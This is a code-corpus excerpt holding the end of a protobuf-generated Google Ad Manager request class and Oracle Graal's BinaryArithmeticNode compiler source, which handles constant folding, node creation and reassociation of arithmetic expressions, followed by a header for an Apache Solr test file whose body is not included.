* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) } // @@protoc_insertion_point(class_scope:google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) private static final com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest(); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<UpdatePrivateAuctionDealRequest> PARSER = new com.google.protobuf.AbstractParser<UpdatePrivateAuctionDealRequest>() { @java.lang.Override public UpdatePrivateAuctionDealRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch 
(com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<UpdatePrivateAuctionDealRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<UpdatePrivateAuctionDealRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
oracle/graal
36,066
compiler/src/jdk.graal.compiler/src/jdk/graal/compiler/nodes/calc/BinaryArithmeticNode.java
/* * Copyright (c) 2009, 2025, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. 
*/ package jdk.graal.compiler.nodes.calc; import static jdk.graal.compiler.nodeinfo.NodeCycles.CYCLES_1; import static jdk.graal.compiler.nodeinfo.NodeSize.SIZE_1; import java.util.Arrays; import jdk.graal.compiler.core.common.type.ArithmeticOpTable; import jdk.graal.compiler.core.common.type.ArithmeticOpTable.BinaryOp; import jdk.graal.compiler.core.common.type.ArithmeticStamp; import jdk.graal.compiler.core.common.type.FloatStamp; import jdk.graal.compiler.core.common.type.IntegerStamp; import jdk.graal.compiler.core.common.type.Stamp; import jdk.graal.compiler.debug.Assertions; import jdk.graal.compiler.debug.GraalError; import jdk.graal.compiler.graph.Graph; import jdk.graal.compiler.graph.Node; import jdk.graal.compiler.graph.NodeClass; import jdk.graal.compiler.graph.iterators.NodePredicate; import jdk.graal.compiler.nodeinfo.NodeInfo; import jdk.graal.compiler.nodes.ArithmeticOperation; import jdk.graal.compiler.nodes.ConstantNode; import jdk.graal.compiler.nodes.NodeView; import jdk.graal.compiler.nodes.StructuredGraph; import jdk.graal.compiler.nodes.ValueNode; import jdk.graal.compiler.nodes.ValuePhiNode; import jdk.graal.compiler.nodes.extended.GuardedNode; import jdk.graal.compiler.nodes.spi.ArithmeticLIRLowerable; import jdk.graal.compiler.nodes.spi.Canonicalizable; import jdk.graal.compiler.nodes.spi.CanonicalizerTool; import jdk.graal.compiler.nodes.spi.NodeValueMap; import jdk.vm.ci.meta.Constant; @NodeInfo(cycles = CYCLES_1, size = SIZE_1) public abstract class BinaryArithmeticNode<OP> extends BinaryNode implements ArithmeticOperation, ArithmeticLIRLowerable, Canonicalizable.Binary<ValueNode> { @SuppressWarnings("rawtypes") public static final NodeClass<BinaryArithmeticNode> TYPE = NodeClass.create(BinaryArithmeticNode.class); protected BinaryArithmeticNode(NodeClass<? 
extends BinaryArithmeticNode<OP>> c, BinaryOp<OP> opForStampComputation, ValueNode x, ValueNode y) { super(c, opForStampComputation.foldStamp(x.stamp(NodeView.DEFAULT), y.stamp(NodeView.DEFAULT)), x, y); } protected BinaryArithmeticNode(NodeClass<? extends BinaryArithmeticNode<OP>> c, Stamp stamp, ValueNode x, ValueNode y) { super(c, stamp, x, y); } public static ArithmeticOpTable getArithmeticOpTable(ValueNode forValue) { return ArithmeticOpTable.forStamp(forValue.stamp(NodeView.DEFAULT)); } protected abstract BinaryOp<OP> getOp(ArithmeticOpTable table); protected final BinaryOp<OP> getOp(ValueNode forX, ValueNode forY) { ArithmeticOpTable table = getArithmeticOpTable(forX); assert table.equals(getArithmeticOpTable(forY)) : Assertions.errorMessage("Invalid table ops", forX, table, forY, getArithmeticOpTable(forY)); return getOp(table); } @Override public final BinaryOp<OP> getArithmeticOp() { return getOp(getX(), getY()); } @Override public ValueNode canonical(CanonicalizerTool tool, ValueNode forX, ValueNode forY) { NodeView view = NodeView.from(tool); ValueNode result = tryConstantFold(getOp(forX, forY), forX, forY, stamp(view), view); if (result != null) { return result; } if (forX instanceof ConditionalNode && forY.isConstant() && forX.hasExactlyOneUsage()) { ConditionalNode conditionalNode = (ConditionalNode) forX; BinaryOp<OP> arithmeticOp = getArithmeticOp(); ConstantNode trueConstant = tryConstantFold(arithmeticOp, conditionalNode.trueValue(), forY, this.stamp(view), view); if (trueConstant != null) { ConstantNode falseConstant = tryConstantFold(arithmeticOp, conditionalNode.falseValue(), forY, this.stamp(view), view); if (falseConstant != null) { // @formatter:off /* The arithmetic is folded into a constant on both sides of the conditional. * Example: * (cond ? -5 : 5) + 100 * canonicalizes to: * (cond ? 
95 : 105) */ // @formatter:on return ConditionalNode.create(conditionalNode.condition, trueConstant, falseConstant, view); } } } return this; } @SuppressWarnings("unused") public static <OP> ConstantNode tryConstantFold(BinaryOp<OP> op, ValueNode forX, ValueNode forY, Stamp stamp, NodeView view) { if (forX.isConstant() && forY.isConstant()) { Constant ret = op.foldConstant(forX.asConstant(), forY.asConstant()); if (ret != null) { return ConstantNode.forPrimitive(stamp, ret); } } return null; } @Override public Stamp foldStamp(Stamp stampX, Stamp stampY) { assert stampX.isCompatible(x.stamp(NodeView.DEFAULT)) : Assertions.errorMessageContext("this", this, "xStamp", x.stamp(NodeView.DEFAULT), "stampX", stampX); assert stampY.isCompatible(y.stamp(NodeView.DEFAULT)) : Assertions.errorMessageContext("this", this, "xStamp", x.stamp(NodeView.DEFAULT), "stampX", stampX); return getArithmeticOp().foldStamp(stampX, stampY); } public static ValueNode binaryIntegerOp(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view, BinaryOp<?> op) { return graph.addOrUniqueWithInputs(binaryIntegerOp(v1, v2, view, op)); } public static ValueNode binaryIntegerOp(ValueNode v1, ValueNode v2, NodeView view, BinaryOp<?> op) { if (IntegerStamp.OPS.getAdd().equals(op)) { return add(v1, v2, view); } else if (IntegerStamp.OPS.getSub().equals(op)) { return sub(v1, v2, view); } else if (IntegerStamp.OPS.getMul().equals(op)) { return mul(v1, v2, view); } else if (IntegerStamp.OPS.getRem().equals(op)) { return rem(v1, v2, view); } else if (IntegerStamp.OPS.getAnd().equals(op)) { return and(v1, v2, view); } else if (IntegerStamp.OPS.getOr().equals(op)) { return or(v1, v2, view); } else if (IntegerStamp.OPS.getXor().equals(op)) { return xor(v1, v2, view); } else if (IntegerStamp.OPS.getShl().equals(op)) { return shl(v1, v2, view); } else if (IntegerStamp.OPS.getUShr().equals(op)) { return ushr(v1, v2, view); } else if (IntegerStamp.OPS.getShr().equals(op)) { return shr(v1, v2, view); } else 
if (IntegerStamp.OPS.getMax().equals(op)) { return max(v1, v2, view); } else if (IntegerStamp.OPS.getMin().equals(op)) { return min(v1, v2, view); } else if (IntegerStamp.OPS.getUMax().equals(op)) { return umax(v1, v2, view); } else if (IntegerStamp.OPS.getUMin().equals(op)) { return umin(v1, v2, view); } else if (Arrays.asList(IntegerStamp.OPS.getBinaryOps()).contains(op)) { GraalError.unimplemented(String.format("creating %s via BinaryArithmeticNode#binaryIntegerOp is not implemented yet", op)); } else { GraalError.shouldNotReachHere(String.format("%s is not a binary operation!", op)); } return null; } public static ValueNode binaryFloatOp(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view, BinaryOp<?> op) { return graph.addOrUniqueWithInputs(binaryFloatOp(v1, v2, view, op)); } public static ValueNode binaryFloatOp(ValueNode v1, ValueNode v2, NodeView view, BinaryOp<?> op) { if (FloatStamp.OPS.getAdd().equals(op)) { return add(v1, v2, view); } else if (FloatStamp.OPS.getSub().equals(op)) { return sub(v1, v2, view); } else if (FloatStamp.OPS.getMul().equals(op)) { return mul(v1, v2, view); } else if (FloatStamp.OPS.getDiv().equals(op)) { return FloatDivNode.create(v1, v2, view); } else if (FloatStamp.OPS.getAnd().equals(op)) { return and(v1, v2, view); } else if (FloatStamp.OPS.getOr().equals(op)) { return or(v1, v2, view); } else if (FloatStamp.OPS.getXor().equals(op)) { return xor(v1, v2, view); } else if (FloatStamp.OPS.getMax().equals(op)) { return max(v1, v2, view); } else if (FloatStamp.OPS.getMin().equals(op)) { return min(v1, v2, view); } else if (Arrays.asList(FloatStamp.OPS.getBinaryOps()).contains(op)) { GraalError.unimplemented(String.format("creating %s via BinaryArithmeticNode#binaryFloatOp is not implemented yet", op)); } else { GraalError.shouldNotReachHere(String.format("%s is not a binary operation!", op)); } return null; } public static ValueNode add(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return 
graph.addOrUniqueWithInputs(AddNode.create(v1, v2, view)); } public static ValueNode add(ValueNode v1, ValueNode v2, NodeView view) { return AddNode.create(v1, v2, view); } public static ValueNode add(ValueNode v1, ValueNode v2) { return add(v1, v2, NodeView.DEFAULT); } public static ValueNode sub(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(SubNode.create(v1, v2, view)); } public static ValueNode sub(ValueNode v1, ValueNode v2, NodeView view) { return SubNode.create(v1, v2, view); } public static ValueNode sub(ValueNode v1, ValueNode v2) { return sub(v1, v2, NodeView.DEFAULT); } public static ValueNode mul(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(MulNode.create(v1, v2, view)); } public static ValueNode mul(ValueNode v1, ValueNode v2, NodeView view) { return MulNode.create(v1, v2, view); } public static ValueNode mul(ValueNode v1, ValueNode v2) { return mul(v1, v2, NodeView.DEFAULT); } public static ValueNode rem(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(RemNode.create(v1, v2, view)); } public static ValueNode rem(ValueNode v1, ValueNode v2, NodeView view) { return RemNode.create(v1, v2, view); } public static ValueNode rem(ValueNode v1, ValueNode v2) { return rem(v1, v2, NodeView.DEFAULT); } public static ValueNode and(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(AndNode.create(v1, v2, view)); } public static ValueNode and(ValueNode v1, ValueNode v2, NodeView view) { return AndNode.create(v1, v2, view); } public static ValueNode and(ValueNode v1, ValueNode v2) { return and(v1, v2, NodeView.DEFAULT); } public static ValueNode or(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(OrNode.create(v1, v2, view)); } public static ValueNode or(ValueNode v1, ValueNode v2, NodeView view) 
{ return OrNode.create(v1, v2, view); } public static ValueNode or(ValueNode v1, ValueNode v2) { return or(v1, v2, NodeView.DEFAULT); } public static ValueNode xor(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(XorNode.create(v1, v2, view)); } public static ValueNode xor(ValueNode v1, ValueNode v2, NodeView view) { return XorNode.create(v1, v2, view); } public static ValueNode xor(ValueNode v1, ValueNode v2) { return xor(v1, v2, NodeView.DEFAULT); } public static ValueNode max(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(MaxNode.create(v1, v2, view)); } public static ValueNode max(ValueNode v1, ValueNode v2, NodeView view) { return MaxNode.create(v1, v2, view); } public static ValueNode max(ValueNode v1, ValueNode v2) { return max(v1, v2, NodeView.DEFAULT); } public static ValueNode min(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(MinNode.create(v1, v2, view)); } public static ValueNode min(ValueNode v1, ValueNode v2, NodeView view) { return MinNode.create(v1, v2, view); } public static ValueNode min(ValueNode v1, ValueNode v2) { return min(v1, v2, NodeView.DEFAULT); } public static ValueNode umax(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(UnsignedMaxNode.create(v1, v2, view)); } public static ValueNode umax(ValueNode v1, ValueNode v2, NodeView view) { return UnsignedMaxNode.create(v1, v2, view); } public static ValueNode umax(ValueNode v1, ValueNode v2) { return umax(v1, v2, NodeView.DEFAULT); } public static ValueNode umin(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(UnsignedMinNode.create(v1, v2, view)); } public static ValueNode umin(ValueNode v1, ValueNode v2, NodeView view) { return UnsignedMinNode.create(v1, v2, view); } public static ValueNode umin(ValueNode v1, ValueNode 
v2) { return umin(v1, v2, NodeView.DEFAULT); } public static ValueNode shl(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(LeftShiftNode.create(v1, v2, view)); } public static ValueNode shl(ValueNode v1, ValueNode v2, NodeView view) { return LeftShiftNode.create(v1, v2, view); } public static ValueNode shl(ValueNode v1, ValueNode v2) { return shl(v1, v2, NodeView.DEFAULT); } public static ValueNode shr(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(RightShiftNode.create(v1, v2, view)); } public static ValueNode shr(ValueNode v1, ValueNode v2, NodeView view) { return RightShiftNode.create(v1, v2, view); } public static ValueNode shr(ValueNode v1, ValueNode v2) { return shr(v1, v2, NodeView.DEFAULT); } public static ValueNode ushr(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(UnsignedRightShiftNode.create(v1, v2, view)); } public static ValueNode ushr(ValueNode v1, ValueNode v2, NodeView view) { return UnsignedRightShiftNode.create(v1, v2, view); } public static ValueNode ushr(ValueNode v1, ValueNode v2) { return ushr(v1, v2, NodeView.DEFAULT); } public static ValueNode branchlessMin(ValueNode v1, ValueNode v2, NodeView view) { if (v1.isDefaultConstant() && !v2.isDefaultConstant()) { return branchlessMin(v2, v1, view); } int bits = ((IntegerStamp) v1.stamp(view)).getBits(); assert ((IntegerStamp) v2.stamp(view)).getBits() == bits : bits + " and v2 " + v2; ValueNode t1 = sub(v1, v2, view); ValueNode t2 = RightShiftNode.create(t1, bits - 1, view); ValueNode t3 = AndNode.create(t1, t2, view); return add(v2, t3, view); } public static ValueNode branchlessMax(ValueNode v1, ValueNode v2, NodeView view) { if (v1.isDefaultConstant() && !v2.isDefaultConstant()) { return branchlessMax(v2, v1, view); } int bits = ((IntegerStamp) v1.stamp(view)).getBits(); assert ((IntegerStamp) v2.stamp(view)).getBits() == bits : 
bits + " and v2 " + v2; if (v2.isDefaultConstant()) { // prefer a & ~(a>>31) to a - (a & (a>>31)) return AndNode.create(v1, NotNode.create(RightShiftNode.create(v1, bits - 1, view)), view); } else { ValueNode t1 = sub(v1, v2, view); ValueNode t2 = RightShiftNode.create(t1, bits - 1, view); ValueNode t3 = AndNode.create(t1, t2, view); return sub(v1, t3, view); } } private enum ReassociateMatch { x, y; public ValueNode getValue(BinaryNode binary) { switch (this) { case x: return binary.getX(); case y: return binary.getY(); default: throw GraalError.shouldNotReachHereUnexpectedValue(this); // ExcludeFromJacocoGeneratedReport } } public ValueNode getOtherValue(BinaryNode binary) { switch (this) { case x: return binary.getY(); case y: return binary.getX(); default: throw GraalError.shouldNotReachHereUnexpectedValue(this); // ExcludeFromJacocoGeneratedReport } } } private static ReassociateMatch findReassociate(BinaryNode binary, NodePredicate criterion) { boolean resultX = criterion.apply(binary.getX()); boolean resultY = criterion.apply(binary.getY()); if (resultX && !resultY) { return ReassociateMatch.x; } if (!resultX && resultY) { return ReassociateMatch.y; } return null; } private static ReassociateMatch findReassociate(BinaryArithmeticNode<?> parent, ValueNode child, NodePredicate criterion) { if (!isReassociative(parent, child)) { return null; } // "child" should be single used to "parent", or it might be not worth for the // re-association. 
if (child.hasExactlyOneUsage() && child.usages().first().equals(parent)) { return findReassociate((BinaryNode) child, criterion); } return null; } private static boolean isReassociative(BinaryArithmeticNode<?> parent, ValueNode child) { if (!parent.mayReassociate()) { return false; } if (isNonExactAddOrSub(parent)) { return isNonExactAddOrSub(child); } return child.getClass() == parent.getClass(); } /** * Determines whether this operation may be reassociated in the sense of * {@link #reassociateUnmatchedValues} and {@link #reassociateMatchedValues}. These methods can * perform transformations like {@code (a * 2) * b => (a * b) * 2}. In general, these * transformations require the binary operation to be both {@linkplain BinaryOp#isAssociative() * associative} to allow shifting of parentheses and {@linkplain BinaryOp#isCommutative() * commutative} to allow changing the order of the operands. * <p/> * As a special case, subtraction on integers allows certain similar transformations, especially * in expressions where it is mixed with addition. For example, * {@link #reassociateUnmatchedValues} can transform {@code x + (C - y) -> (x - y) + C}, and * {@link SubNode#canonical(CanonicalizerTool, ValueNode, ValueNode)} can transform * {@code a - (a + b) -> -b}. Therefore this method returns {@code true} for integer * subtraction. Users of this method must still check if the operation in question is * subtraction and ensure that they only reassociate subtractions in sound ways. Floating-point * subtraction does not permit such mathematically sound transformations due to rounding errors. */ public boolean mayReassociate() { return mayReassociate(getArithmeticOp(), stamp(NodeView.DEFAULT)); } /** * Determines whether the {@code op} may be reassociated in the sense of * {@link #reassociateUnmatchedValues} and {@link #reassociateMatchedValues}. 
* * @see #mayReassociate() */ public static boolean mayReassociate(BinaryOp<?> op, Stamp stamp) { return (op.isAssociative() && op.isCommutative()) || (stamp.isIntegerStamp() && op.equals(((ArithmeticStamp) stamp).getOps().getSub())); } /** * Tries to push down values which satisfy the criterion. This is an assistant function for * {@linkplain BinaryArithmeticNode#reassociateMatchedValues}. For example with a constantness * criterion: {@code (a * 2) * b => (a * b) * 2} * * <p> * This method accepts only {@linkplain #mayReassociate() operations that allow reassociation} * such as +, -, *, &amp;, |, ^, min, and max. */ public static ValueNode reassociateUnmatchedValues(BinaryArithmeticNode<?> node, NodePredicate criterion, NodeView view) { ValueNode forX = node.getX(); ValueNode forY = node.getY(); BinaryOp<?> op = node.getOp(forX, forY); GraalError.guarantee(node.mayReassociate(), "%s: binary op %s does not satisfy precondition of reassociateUnmatchedValues", node, op); // No need to re-associate if one of the operands has matched the criterion. if (criterion.apply(forX) || criterion.apply(forY)) { return node; } // Find the operand that could be re-associated with its parent node. 
ReassociateMatch match = findReassociate(node, forX, criterion); BinaryNode matchBinary = null; ValueNode otherValue1 = null; if (match != null) { matchBinary = (BinaryNode) forX; otherValue1 = forY; } else { match = findReassociate(node, forY, criterion); if (match != null) { matchBinary = (BinaryNode) forY; otherValue1 = forX; } } if (match == null) { return node; } assert matchBinary != null; assert otherValue1 != null; ValueNode matchValue = match.getValue(matchBinary); ValueNode otherValue2 = match.getOtherValue(matchBinary); if (isNonExactAddOrSub(node)) { //@formatter:off /** * Re-association for the following patterns: * * x + (y + C) -> (x + y) + C * x + (y - C) -> (x + y) - C * x + (C - y) -> (x - y) + C * * x - (C - y) -> (x + y) - C * x - (y - C) -> (x - y) + C * x - (C + y) -> (x - y) - C * * (C - x) - y -> C - (x + y) * (x - C) - y -> (x - y) - C * (C + x) - y -> (x - y) + C */ //@formatter:on boolean addSub = isNonExactAdd(node) && isNonExactSub(matchBinary); boolean subAdd = isNonExactSub(node) && isNonExactAdd(matchBinary); boolean subSub = isNonExactSub(node) && isNonExactSub(matchBinary); boolean sub = false; boolean invertSub = false; if (addSub) { sub = match == ReassociateMatch.y; } else if (subAdd) { sub = matchBinary == forY; } else if (subSub) { sub = (matchBinary == forX && match == ReassociateMatch.y) || (matchBinary == forY && match == ReassociateMatch.x); invertSub = matchBinary == forX && match == ReassociateMatch.x; } // For patterns like "(x - C) - y" and "(C + x) - y", swap the operands of association. 
if (node instanceof SubNode && matchBinary == forX) { ValueNode temp = otherValue1; otherValue1 = otherValue2; otherValue2 = temp; } ValueNode associated; if (subAdd || (addSub && match == ReassociateMatch.x) || (subSub && match == ReassociateMatch.y)) { associated = BinaryArithmeticNode.sub(otherValue1, otherValue2, view); } else { associated = BinaryArithmeticNode.add(otherValue1, otherValue2, view); } if (invertSub) { return BinaryArithmeticNode.sub(matchValue, associated, view); } else if (sub) { return BinaryArithmeticNode.sub(associated, matchValue, view); } else { return BinaryArithmeticNode.add(associated, matchValue, view); } } else if (isNonExactMul(node)) { // Re-association from "x * (y * C)" to "(x * y) * C" return BinaryArithmeticNode.mul(matchValue, BinaryArithmeticNode.mul(otherValue1, otherValue2, view), view); } else if (node instanceof AndNode) { // Re-association from "x & (y & C)" to "(x & y) & C" return AndNode.create(matchValue, AndNode.create(otherValue1, otherValue2, view), view); } else if (node instanceof OrNode) { // Re-association from "x | (y | C)" to "(x | y) | C" return OrNode.create(matchValue, OrNode.create(otherValue1, otherValue2, view), view); } else if (node instanceof XorNode) { // Re-association from "x ^ (y ^ C)" to "(x ^ y) ^ C" return XorNode.create(matchValue, XorNode.create(otherValue1, otherValue2, view), view); } else if (node instanceof MinNode) { // Re-association from "min(x, min(y, C))" to "min(min(x, y), C)" return MinNode.create(matchValue, MinNode.create(otherValue1, otherValue2, view), view); } else if (node instanceof MaxNode) { // Re-association from "max(x, max(y, C))" to "max(max(x, y), C)" return MaxNode.create(matchValue, MaxNode.create(otherValue1, otherValue2, view), view); } else if (node instanceof UnsignedMinNode) { // Re-association from "umin(x, umin(y, C))" to "umin(umin(x, y), C)" return UnsignedMinNode.create(matchValue, UnsignedMinNode.create(otherValue1, otherValue2, view), view); } else if 
(node instanceof UnsignedMaxNode) { // Re-association from "umax(x, umax(y, C))" to "umax(umax(x, y), C)" return UnsignedMaxNode.create(matchValue, UnsignedMaxNode.create(otherValue1, otherValue2, view), view); } else { throw GraalError.shouldNotReachHere("unhandled node in reassociation with constants: " + node); // ExcludeFromJacocoGeneratedReport } } //@formatter:off /* * In reassociate, complexity comes from the handling of IntegerSub (non commutative) which can * be mixed with IntegerAdd. It first tries to find m1, m2 which match the criterion : * (a o m2) o m1 * (m2 o a) o m1 * m1 o (a o m2) * m1 o (m2 o a) * It then produces 4 boolean for the -/+ cases: * invertA : should the final expression be like *-a (rather than a+*) * aSub : should the final expression be like a-* (rather than a+*) * invertM1 : should the final expression contain -m1 * invertM2 : should the final expression contain -m2 * */ //@formatter:on /** * Tries to re-associate values which satisfy the criterion. For example with a constantness * criterion: {@code (a + 2) + 1 => a + (1 + 2)} * <p> * This method accepts only {@linkplain #mayReassociate() operations that allow reassociation} * such as +, -, *, &amp;, |, ^, min, and max. 
* * @param forY * @param forX */ public static ValueNode reassociateMatchedValues(BinaryArithmeticNode<?> node, NodePredicate criterion, ValueNode forX, ValueNode forY, NodeView view) { BinaryOp<?> op = node.getOp(forX, forY); GraalError.guarantee(node.mayReassociate(), "%s: binary op %s does not satisfy precondition of reassociateMatchedValues", node, op); ReassociateMatch match1 = findReassociate(node, criterion); if (match1 == null) { return node; } if (isExactMathOperation(node)) { return node; } if (node instanceof GuardedNode && ((GuardedNode) node).getGuard() != null) { // cannot re-associate guarded nodes return node; } ValueNode otherValue = match1.getOtherValue(node); boolean addSub = false; boolean subAdd = false; if (otherValue.getClass() != node.getClass()) { if (isNonExactAdd(node) && isNonExactSub(otherValue)) { addSub = true; } else if (isNonExactSub(node) && isNonExactAdd(otherValue)) { subAdd = true; } else { return node; } } BinaryNode other = (BinaryNode) otherValue; ReassociateMatch match2 = findReassociate(other, criterion); if (match2 == null) { return node; } if (isExactMathOperation(other)) { return node; } boolean invertA = false; boolean aSub = false; boolean invertM1 = false; boolean invertM2 = false; if (addSub) { invertM2 = match2 == ReassociateMatch.y; invertA = !invertM2; } else if (subAdd) { invertA = invertM2 = match1 == ReassociateMatch.x; invertM1 = !invertM2; } else if (isNonExactSub(node) && isNonExactSub(other)) { invertA = match1 == ReassociateMatch.x ^ match2 == ReassociateMatch.x; aSub = match1 == ReassociateMatch.y && match2 == ReassociateMatch.y; invertM1 = match1 == ReassociateMatch.y && match2 == ReassociateMatch.x; invertM2 = match1 == ReassociateMatch.x && match2 == ReassociateMatch.x; } assert !(invertM1 && invertM2) && !(invertA && aSub) : Assertions.errorMessageContext("node", node, "invertM1", invertM1, "invertM2", invertM2, "invertA", invertA, "aSub", aSub); ValueNode m1 = match1.getValue(node); ValueNode m2 = 
match2.getValue(other); ValueNode a = match2.getOtherValue(other); if (isNonExactAddOrSub(node)) { ValueNode associated; if (invertM1) { associated = BinaryArithmeticNode.sub(m2, m1, view); } else if (invertM2) { associated = BinaryArithmeticNode.sub(m1, m2, view); } else { associated = BinaryArithmeticNode.add(m1, m2, view); } if (invertA) { return BinaryArithmeticNode.sub(associated, a, view); } if (aSub) { return BinaryArithmeticNode.sub(a, associated, view); } return BinaryArithmeticNode.add(a, associated, view); } else if (isNonExactMul(node)) { return BinaryArithmeticNode.mul(a, mul(m1, m2, view), view); } else if (node instanceof AndNode) { return AndNode.create(a, AndNode.create(m1, m2, view), view); } else if (node instanceof OrNode) { return OrNode.create(a, OrNode.create(m1, m2, view), view); } else if (node instanceof XorNode) { return XorNode.create(a, XorNode.create(m1, m2, view), view); } else if (node instanceof MaxNode) { return MaxNode.create(a, MaxNode.create(m1, m2, view), view); } else if (node instanceof MinNode) { return MinNode.create(a, MinNode.create(m1, m2, view), view); } else if (node instanceof UnsignedMaxNode) { return UnsignedMaxNode.create(a, UnsignedMaxNode.create(m1, m2, view), view); } else if (node instanceof UnsignedMinNode) { return UnsignedMinNode.create(a, UnsignedMinNode.create(m1, m2, view), view); } else { throw GraalError.shouldNotReachHere("unhandled node in reassociation with matched values: " + node); // ExcludeFromJacocoGeneratedReport } } private static boolean isNonExactMul(Node n) { if (n instanceof MulNode) { return !((MulNode) n).isExact(); } return false; } private static boolean isNonExactAdd(Node n) { if (n instanceof AddNode) { return !((AddNode) n).isExact(); } return false; } private static boolean isNonExactSub(Node n) { if (n instanceof SubNode) { return !((SubNode) n).isExact(); } return false; } private static boolean isNonExactAddOrSub(Node n) { return isNonExactAdd(n) || isNonExactSub(n); } private 
static boolean isExactMathOperation(Node n) { if (n instanceof AddNode) { return ((AddNode) n).isExact(); } if (n instanceof SubNode) { return ((SubNode) n).isExact(); } if (n instanceof MulNode) { return ((MulNode) n).isExact(); } return false; } /** * Ensure a canonical ordering of inputs for commutative nodes to improve GVN results. Order the * inputs by increasing {@link Node#id} and call {@link Graph#findDuplicate(Node)} on the node * if it's currently in a graph. It's assumed that if there was a constant on the left it's been * moved to the right by other code and that ordering is left alone. * * @return the original node or another node with the same input ordering */ @SuppressWarnings("deprecation") public BinaryNode maybeCommuteInputs() { assert this instanceof BinaryCommutative : Assertions.errorMessageContext("this", this); if (!y.isConstant() && (x.isConstant() || x.getId() > y.getId())) { ValueNode tmp = x; x = y; y = tmp; if (graph() != null) { // See if this node already exists BinaryNode duplicate = graph().findDuplicate(this); if (duplicate != null) { return duplicate; } } } return this; } /** * Determines if it would be better to swap the inputs in order to produce better assembly code. * First we try to pick a value which is dead after this use. If both values are dead at this * use then we try pick an induction variable phi to encourage the phi to live in a single * register. * * @param nodeValueMap * @return true if inputs should be swapped, false otherwise */ protected boolean shouldSwapInputs(NodeValueMap nodeValueMap) { final boolean xHasOtherUsages = getX().hasUsagesOtherThan(this, nodeValueMap); final boolean yHasOtherUsages = getY().hasUsagesOtherThan(this, nodeValueMap); if (!getY().isConstant() && !yHasOtherUsages) { if (xHasOtherUsages == yHasOtherUsages) { return getY() instanceof ValuePhiNode && getY().inputs().contains(this); } else { return true; } } return false; } }
apache/solr
35,588
solr/solrj/src/test/org/apache/solr/client/solrj/impl/BasicHttpSolrClientTest.java
